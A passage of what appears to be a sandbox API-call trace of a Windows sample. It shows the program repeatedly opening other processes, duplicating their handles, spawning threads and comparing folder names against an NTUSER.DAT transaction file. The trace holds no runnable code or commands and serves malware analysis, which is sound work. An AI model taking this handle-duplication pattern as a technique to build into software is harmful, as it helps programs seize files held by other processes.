hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.351] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.352] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.352] CloseHandle (hObject=0x1e4) returned 1 [0166.352] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0166.352] CloseHandle (hObject=0x194) returned 1 [0166.352] CloseHandle (hObject=0x1e8) returned 1 [0166.352] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc0) returned 0x1e8 [0166.352] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.352] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.353] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.354] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.354] CloseHandle (hObject=0x1e4) returned 1 [0166.354] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.354] CloseHandle (hObject=0x194) returned 1 [0166.354] CloseHandle (hObject=0x1e8) returned 1 [0166.354] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc0) returned 0x1e8 [0166.354] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.355] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.356] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.356] CloseHandle (hObject=0x1e4) returned 1 [0166.356] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.356] CloseHandle (hObject=0x194) returned 1 [0166.356] CloseHandle (hObject=0x1e8) returned 1 [0166.356] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x534) returned 0x1e8 [0166.356] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.357] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.358] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.358] CloseHandle (hObject=0x1e4) returned 1 [0166.358] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.358] CloseHandle (hObject=0x194) returned 1 [0166.359] CloseHandle (hObject=0x1e8) returned 1 [0166.359] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x534) returned 0x1e8 [0166.359] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.359] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.359] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.360] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.360] CloseHandle (hObject=0x1e4) returned 1 [0166.360] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.360] CloseHandle (hObject=0x194) returned 1 [0166.361] CloseHandle (hObject=0x1e8) returned 1 [0166.361] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x70c) returned 0x1e8 [0166.361] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.361] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.362] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.362] CloseHandle (hObject=0x1e4) returned 1 [0166.362] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.363] CloseHandle (hObject=0x194) returned 1 [0166.363] CloseHandle (hObject=0x1e8) returned 1 [0166.363] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x70c) returned 0x1e8 [0166.363] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.363] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.363] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.364] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.364] CloseHandle (hObject=0x1e4) returned 1 [0166.364] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.364] CloseHandle (hObject=0x194) returned 1 [0166.364] CloseHandle (hObject=0x1e8) returned 1 [0166.364] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x290) returned 0x1e8 [0166.365] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.365] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.366] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.366] CloseHandle (hObject=0x1e4) returned 1 [0166.366] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.366] CloseHandle (hObject=0x194) returned 1 [0166.366] CloseHandle (hObject=0x1e8) returned 1 [0166.366] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x290) returned 0x1e8 [0166.366] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.366] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.367] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.368] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.368] CloseHandle (hObject=0x1e4) returned 1 [0166.368] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.368] CloseHandle (hObject=0x194) returned 1 [0166.368] CloseHandle (hObject=0x1e8) returned 1 [0166.369] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b0) returned 0x1e8 [0166.369] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.369] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.370] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.370] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.370] CloseHandle (hObject=0x1e4) returned 1 [0166.371] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.371] CloseHandle (hObject=0x194) returned 1 [0166.371] CloseHandle (hObject=0x1e8) returned 1 [0166.371] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b0) returned 0x1e8 [0166.371] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.371] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.371] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.372] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.372] CloseHandle (hObject=0x1e4) returned 1 [0166.372] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.372] CloseHandle (hObject=0x194) returned 1 [0166.372] CloseHandle (hObject=0x1e8) returned 1 [0166.373] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x1e8 [0166.373] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.373] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.374] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.374] CloseHandle (hObject=0x1e4) returned 1 [0166.374] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.374] CloseHandle (hObject=0x194) returned 1 [0166.374] CloseHandle (hObject=0x1e8) returned 1 [0166.374] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x1e8 [0166.374] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.375] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.375] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.376] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.376] CloseHandle (hObject=0x1e4) returned 1 [0166.376] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.376] CloseHandle (hObject=0x194) returned 1 [0166.377] CloseHandle (hObject=0x1e8) returned 1 [0166.377] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x1e8 [0166.377] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.377] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.378] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.378] CloseHandle (hObject=0x1e4) returned 1 [0166.378] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.378] CloseHandle (hObject=0x194) returned 1 [0166.378] CloseHandle (hObject=0x1e8) returned 1 [0166.379] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x1e8 [0166.379] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.379] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.379] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.380] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.380] CloseHandle (hObject=0x1e4) returned 1 [0166.380] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0166.380] CloseHandle (hObject=0x194) returned 1 [0166.380] CloseHandle (hObject=0x1e8) returned 1 [0166.380] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x1e8 [0166.381] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.381] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.381] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.382] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.382] CloseHandle (hObject=0x1e4) returned 1 [0166.382] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.382] CloseHandle (hObject=0x194) returned 1 [0166.383] CloseHandle (hObject=0x1e8) returned 1 [0166.383] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x1e8 [0166.383] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.383] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.384] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.384] CloseHandle (hObject=0x1e4) returned 1 [0166.384] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0166.384] CloseHandle (hObject=0x194) returned 1 [0166.384] CloseHandle (hObject=0x1e8) returned 1 [0166.384] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x1e8 [0166.384] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.384] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.385] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.386] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.386] CloseHandle (hObject=0x1e4) returned 1 [0166.386] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.386] CloseHandle (hObject=0x194) returned 1 [0166.386] CloseHandle (hObject=0x1e8) returned 1 [0166.386] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x1e8 [0166.386] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.387] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.388] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.388] CloseHandle (hObject=0x1e4) returned 1 [0166.388] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.388] CloseHandle (hObject=0x194) returned 1 [0166.388] CloseHandle (hObject=0x1e8) returned 1 [0166.388] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x1e8 [0166.388] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.390] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.393] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.394] CloseHandle (hObject=0x1e4) returned 1 [0166.394] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.394] CloseHandle (hObject=0x194) returned 1 [0166.394] CloseHandle (hObject=0x1e8) returned 1 [0166.394] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x1e8 [0166.394] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.395] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.395] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.396] CloseHandle (hObject=0x1e4) returned 1 [0166.396] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.396] CloseHandle (hObject=0x194) returned 1 [0166.396] CloseHandle (hObject=0x1e8) returned 1 [0166.396] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x798) returned 0x1e8 [0166.396] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.397] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.398] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.398] CloseHandle (hObject=0x1e4) returned 1 [0166.398] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.398] CloseHandle (hObject=0x194) returned 1 [0166.398] CloseHandle (hObject=0x1e8) returned 1 [0166.398] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x798) returned 0x1e8 [0166.398] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.399] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.399] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.400] CloseHandle (hObject=0x1e4) returned 1 [0166.400] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.400] CloseHandle (hObject=0x194) returned 1 [0166.400] CloseHandle (hObject=0x1e8) returned 1 [0166.400] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5dc) returned 0x1e8 [0166.400] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.400] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.401] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.401] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.402] CloseHandle (hObject=0x1e4) returned 1 [0166.402] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.402] CloseHandle (hObject=0x194) returned 1 [0166.402] CloseHandle (hObject=0x1e8) returned 1 [0166.402] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5dc) returned 0x1e8 [0166.402] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.403] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.403] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.403] CloseHandle (hObject=0x1e4) returned 1 [0166.404] _wcsicmp 